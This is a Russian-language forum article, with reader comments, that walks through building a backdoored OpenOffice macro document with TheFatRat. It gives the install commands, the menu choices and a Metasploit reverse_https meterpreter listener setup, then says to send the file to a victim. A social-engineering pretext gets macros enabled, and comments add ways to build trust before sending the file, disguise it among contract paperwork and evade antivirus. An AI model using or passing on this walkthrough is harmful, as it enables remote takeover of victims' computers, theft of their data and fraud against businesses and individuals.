Новости Авторская статья - TheFatRat взлом Windows через OpenOffice

Сегодня мы поговорим о том, как с помощью инструмента TheFatRat можно взломать любой компьютер на Windows.

OpenOffice -это бесплатная альтернатива Microsoft Office. Не так много, кто использует эту программу, но в небольших фирмах, университетах вынуждены пользоваться именно ей. В связи с тем, что нет бюджета на покупку официальной лицензии Microsoft, а нелицензионной пользоваться запрещено.
Не используйте это в корыстных целях, чтобы рассылать вирус по почтам фирм, людей, взломать и получить всю нужную, интересную информацию. Здесь все представлено лишь для ознакомления.
The Fat Rat - Backdoor для удаленного доступа. Использовать мы его будем на Kali Linux.

Установка
Код:
git clone https://github.com/Screetsec/TheFatRat
cd TheFatRat/
bash setup.sh
Дожидаемся окончания установки и запускаем TheFatRat из консоли командой:
Код:
fatrat
Можете ознакомиться и протестировать все приведенные способы взлома. Но те, что подписаны FUD, уже детектятся 10-20 антивирусами, в том числе и вирус Microsoft Office.

Создание вируса
http://s018.radikal.ru/i519/1707/db/eb0f77e2c0ca.png

Вводим
Код:
7
http://s010.radikal.ru/i311/1707/67/347151109b86.png

Вводим
Код:
4
и ваш IPV4 адрес, любой неиспользуемый порт, затем название документа
http://s019.radikal.ru/i623/1707/9f/33215ab796fa.png

Выбираем полезную нагрузку, например, 6.
http://i057.radikal.ru/1707/a5/ebab362f6e8a.png

Все, ваш файл готов по указанному пути. Отправляйте жертве.
http://s019.radikal.ru/i611/1707/25/7f6d4ac81aef.png

Взлом
Далее мы должны подождать пока сессия откроется. Используем metasploit.
Код:
msfconsole
msf > use multi/handler
msf exploit (handler) > set payload windows/meterpreter/reverse_https
msf exploit (handler) > set LHOST (свой внутренний IP)
msf exploit (handler) > set LPORT 443
msf exploit (handler) >exploit
http://s018.radikal.ru/i500/1707/f1/441a6c9ee56b.png

Когда файл на компьютере жертвы будет запущен, вы увидите что открылась сессия meterpreter.

Рассылая письмом под видом важного документа, необходимо использовать СИ, чтобы разрешили запуск макросов. К примеру, "в документе приведены расчеты за каждый месяц 2017 года. Для автоматического запуска расчетов необходимо разрешить выполнение макросов. "
Ну и все. А дальше делать в консоли можно все, что захотите. Скачивайте, скриньте итп.
Детект вируса 2/38 http://viruscheckmate.com/id/5TXbflBsk9Sx

Как всегда- Великолепно!

Писать желательно, под заключение договора. Плюс несколько писем ни о чём: прайс попросить,
как с кризисом борются, телефон спросить главного или кто это курирует. Пару раз позвонить о времени СОГЛАСОВАНИЯ и т.п. Это расчистит дорогу СИ и повысит доверие.
Бывает при первоначальном заключении договоров требуют Выписку с ЕГЮРЛ, ОГРН,ИНН,УСТАВ, приказ о назначении. С этой толпой доков с разными расширениями( PDF, сканы, Ворд ) можно отправиь свой сюрприз))

В кали есть свои инструменты, спасибо

Смотря от какого антивируса нужно. Veil-evasion, shelter к примеру. В поиске есть.. Собиралась написать статьи по этому поводу. Пока руки не доходят

Да, я не прав. Извини, хотя много таких кому предназначено!

Вроде бы вы ошиблись темой

аа, вы вобщем про FatRat)